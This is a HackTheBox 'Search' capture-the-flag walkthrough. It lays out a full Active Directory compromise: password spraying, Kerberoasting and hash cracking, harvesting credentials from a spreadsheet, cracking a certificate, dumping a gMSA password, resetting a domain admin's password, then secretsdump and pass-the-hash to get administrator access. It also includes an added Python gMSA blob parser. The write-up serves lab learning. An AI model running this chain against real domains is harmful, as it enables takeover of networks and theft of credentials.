HackTheBox – Search Walkthrough – In English
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nmap -T5 -sCV -p- 10.10.11.129 -Pn
┌──(root㉿kali)-[/home/kali/Downloads]
└─# gobuster dir -u http://search.htb -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,sql,txt,wpad,xlsx,xml,aspx -t 64
http://search.htb/#about-section
http://search.htb/images/slide_2.jpg
Testing this set of credentials with crackmapexec, using the naming scheme identified earlier, we are able to authenticate to AD and list the shares on the machine.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# crackmapexec smb search.htb -d search.htb -u hope.sharp -p 'IsolationIsKey?' --shares
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //search.htb/RedirectedFolders$ -U Hope.Sharp
SPN crackable
Since we are not being hunted and we have user credentials, we can get a quick overview of the domain by dumping Active Directory with bloodhound-python.
┌──(root㉿kali)-[/home/kali/Downloads/BloodHound.py]
└─# bloodhound-python -d search.htb -u hope.sharp -c All -p 'IsolationIsKey?' -ns 10.10.11.129
Now import the output files into BloodHound.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# impacket-GetUserSPNs search.htb/hope.sharp:'IsolationIsKey?' -outputfile web_svc_kerberos
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat web_svc_kerberos
┌──(root㉿kali)-[/home/kali/Downloads]
└─# john --wordlist=rockyou.txt web_svc_kerberos
Output:
@3ONEmillionbaby
If we are lucky, this password is reused by a member of the HelpDesk group. We can list all recursive group members using BloodHound.
Running crackmapexec against the list of usernames, we can see that EDGAR.JACOBS probably reused his account password when creating web_svc.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# crackmapexec smb search.htb -u helpdesk -p '@3ONEmillionbaby' --shares
Checking the user's home directory, which is in the RedirectedFolders$ SMB share, we find an interesting-looking Excel file, Phishing_Attempt.xlsx.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# /usr/share/doc/python3-impacket/examples/smbclient.py 'search.htb/EDGAR.JACOBS:@3ONEmillionbaby'@search.htb
# shares
# use RedirectedFolders$
# ls
# cd edgar.jacobs
# ls
# cd Desktop
# ls
# get Phishing_Attempt.xlsx
Selecting everything with CTRL + A, copying it with CTRL + C and pasting it into a new file, we see that the hidden column contained the passwords for the usernames.
Creds
┌──(root㉿kali)-[/home/kali/Downloads]
└─# awk -F' ' '{print $3}' creds > passwords
┌──(root㉿kali)-[/home/kali/Downloads]
└─# awk -F' ' '{print $4}' creds > users
┌──(root㉿kali)-[/home/kali/Downloads]
└─# crackmapexec smb search.htb -u users -p passwords -d search.htb --continue-on-success --no-bruteforce
This gives us:
SMB search.htb 445 RESEARCH [+] search.htb\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18
┌──(root㉿kali)-[/home/kali/Downloads]
└─# /usr/share/doc/python3-impacket/examples/smbclient.py 'search.htb/Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18'@search.htb
# use RedirectedFolders$
# cd sierra.frye
# cd Desktop
# ls
# get user.txt
┌──(root㉿kali)-[/home/kali/Downloads]
└─# smbclient //search.htb/RedirectedFolders$ -U Sierra.Frye
Password: $$49=wide=STRAIGHT=jordan=28$$18
smb: \> cd \sierra.frye\
smb: \sierra.frye\> ls
smb: \sierra.frye\> cd Downloads\
smb: \sierra.frye\Downloads\> ls
smb: \sierra.frye\Downloads\> cd Backups
smb: \sierra.frye\Downloads\Backups\> get search-RESEARCH-CA.p12
smb: \sierra.frye\Downloads\Backups\> get staff.pfx
A .p12 file is a PKCS#12 (Public Key Cryptography Standard #12) archive: a password-protected container holding a certificate together with its private key and other sensitive material, used as a portable format for moving them between programs. Many security and encryption tools consume this format, and it is commonly referred to as a "PFX file".
We can try to import this certificate into the browser (Firefox).
It asks for a password. We can try to crack that password using the tool below.
https://github.com/crackpkcs12/crackpkcs12
┌──(root㉿kali)-[/home/kali/Downloads/p12tool]
└─# go run cmd/main.go crack -c /home/kali/Downloads/staff.pfx -f /home/kali/Downloads/rockyou.txt
On a VM this takes considerably longer. Now that we have the password for the certificate, let's add it to the browser.
There is a specific endpoint that you can access with this certificate.
https://search.htb/staff/en-US/logon.aspx
Now we need to enter the credentials of the Sierra.Frye user to reach the PowerShell console.
Password: misspissy
Username: Sierra.Frye
Password: $$49=wide=STRAIGHT=jordan=28$$18
Computer name: Research
┌──(root㉿kali)-[/home/kali/Downloads]
└─# bloodhound-python -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d search.htb -v --zip -c All,Loggedon -dc search.htb -ns 10.10.11.129
To reach domain admin we will go over multiple ways, the first two of which have probably been patched by now.
All of them start by reading the gMSA password of BIR-ADFS-GMSA$ as sierra.frye. That account in turn has GenericAll over Tristan.Davies, who is a member of the Enterprise Admins, Domain Admins and Administrators groups.
As we are a member of ITSEC, we can read the gMSA password.
BIR-ADFS-GMSA@SEARCH.HTB is a Group Managed Service Account. The group ITSEC@SEARCH.HTB can retrieve the password for the gMSA BIR-ADFS-GMSA@SEARCH.HTB.
https://github.com/micahvandeusen/gMSADumper
┌──(root㉿kali)-[/home/kali/Downloads/gMSADumper]
└─# ./gMSADumper.py -u sierra.frye -p '$$49=wide=STRAIGHT=jordan=28$$18' -l 10.10.11.129 -d search.htb
Output:
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f
┌──(root㉿kali)-[/home/kali/Downloads/gMSADumper]
└─# impacket-psexec "BIR-ADFS-GMSA$"@search.htb -hashes :e1e9fd9e46d0d747e1595167eedcec0f
gMSAs use 240-byte, randomly generated complex passwords, so cracking the hash is not practical; the attack path here is retrieving the password, not guessing it.
- Reading GMSA Password
- Passwordless PowerShell – How to use gMSAs In Your Scripts
- GMSA Attributes in the Active Directory
msDS-GroupMSAMembership (PrincipalsAllowedToRetrieveManagedPassword) – stores the security principals that can access the GMSA password.
msds-ManagedPassword – This attribute contains a BLOB with password information for group-managed service accounts.
msDS-ManagedPasswordId – This constructed attribute contains the key identifier for the current managed password data for a group MSA.
msDS-ManagedPasswordInterval – This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA.
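To make the msDS-ManagedPassword attribute concrete, here is an added example (not gMSADumper's code and not from the original walkthrough) that parses the MSDS-MANAGEDPASSWORD_BLOB layout documented in MS-ADTS section 2.2.20 and derives the NT hash that tools like gMSADumper print. The blob it parses is constructed inline with a short password; the names build_blob, parse_managed_password_blob and nt_hash are chosen here.

```python
import struct
MASK = 0xFFFFFFFF

def md4(data: bytes) -> bytes:  # minimal MD4 (RFC 1320): hashlib's md4 is often disabled under OpenSSL 3
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    rot = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    rounds = [(F, 0, (3, 7, 11, 19), range(16)),
              (G, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
              (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15])]
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X, (a, b, c, d) = struct.unpack("<16I", msg[off:off + 64]), state
        for fn, k, shifts, order in rounds:
            for i, j in enumerate(order):
                a, b, c, d = d, rot((a + fn(b, c, d) + X[j] + k) & MASK, shifts[i % 4]), b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE password; this is the value gMSADumper prints."""
    return md4(password.encode("utf-16-le")).hex()

def parse_managed_password_blob(blob: bytes) -> dict:
    """Parse MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS 2.2.20), the value stored in msDS-ManagedPassword."""
    version, _, length, cur_off, prev_off, q_off, u_off = struct.unpack_from("<HHIHHHH", blob, 0)
    if version != 1 or length != len(blob): raise ValueError("not a version-1 managed password blob")
    def wstr(off):  # UTF-16LE string ending in a two-byte null, scanned on code-unit boundaries
        end = next(i for i in range(off, len(blob), 2) if blob[i:i + 2] == b"\x00\x00")
        return blob[off:end].decode("utf-16-le")
    days = lambda off: struct.unpack_from("<Q", blob, off)[0] / 864_000_000_000  # 100 ns units per day
    current = wstr(cur_off)
    return {"current_password": current, "current_nt_hash": nt_hash(current),
            "previous_password": wstr(prev_off) if prev_off else None,  # offset 0 = no previous password
            "query_interval_days": days(q_off), "unchanged_interval_days": days(u_off)}

def build_blob(current: str, previous, query_days: float, unchanged_days: float) -> bytes:
    """Build a blob with the same layout; used here only to construct sample input."""
    cur = current.encode("utf-16-le") + b"\x00\x00"
    prev = previous.encode("utf-16-le") + b"\x00\x00" if previous else b""
    body = cur + prev
    body += b"\x00" * (-len(body) % 8)  # AlignmentPadding so the QWORD intervals are 8-byte aligned
    q_off = 16 + len(body)
    body += struct.pack("<QQ", int(query_days * 864_000_000_000), int(unchanged_days * 864_000_000_000))
    prev_off = 16 + len(cur) if previous else 0
    return struct.pack("<HHIHHHH", 1, 0, 16 + len(body), 16, prev_off, q_off, q_off + 8) + body

# Constructed sample: a short password stands in for the 240-byte random one a real gMSA gets.
SAMPLE_BLOB = build_blob("S3cr3t-gMSA-pw", "Old-gMSA-pw", query_days=30.0, unchanged_days=25.0)
```

The intervals are the same data that msDS-ManagedPasswordInterval reports in days; a defender reviewing msDS-GroupMSAMembership should treat every principal listed there as holding the plaintext.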
Based on both blogs, we can run commands as BIR-ADFS-GMSA to set up an environment from which we can reach domain admin.
# GMSA (ConvertFrom-ADManagedPasswordBlob comes from the DSInternals module)
$gmsa = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA$' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
$secure = ConvertFrom-ADManagedPasswordBlob $mp
# Credentials
$username = "BIR-ADFS-GMSA"
$password = $secure.SecureCurrentPassword
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList $username, $password
Invoke-Command -ScriptBlock { whoami } -ComputerName RESEARCH -Credential $cred
# The gMSA has GenericAll over Tristan.Davies, so it can reset his password
Invoke-Command -ScriptBlock { net user tristan.davies Password123! /domain } -ComputerName RESEARCH -Credential $cred
┌──(root㉿kali)-[/home/kali/Downloads/gMSADumper]
└─# crackmapexec smb search.htb -u tristan.davies -p 'Password123!' --shares
┌──(root㉿kali)-[/home/kali/Downloads/gMSADumper]
└─# impacket-secretsdump tristan.davies:'Password123!'@search.htb -just-dc-user Administrator
┌──(root㉿kali)-[/home/kali/Downloads/gMSADumper]
└─# impacket-wmiexec administrator@search.htb -hashes aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6
C:\>whoami
C:\>cd Users/Administrator/Desktop
C:\Users\Administrator\Desktop>dir
C:\Users\Administrator\Desktop>type root.txt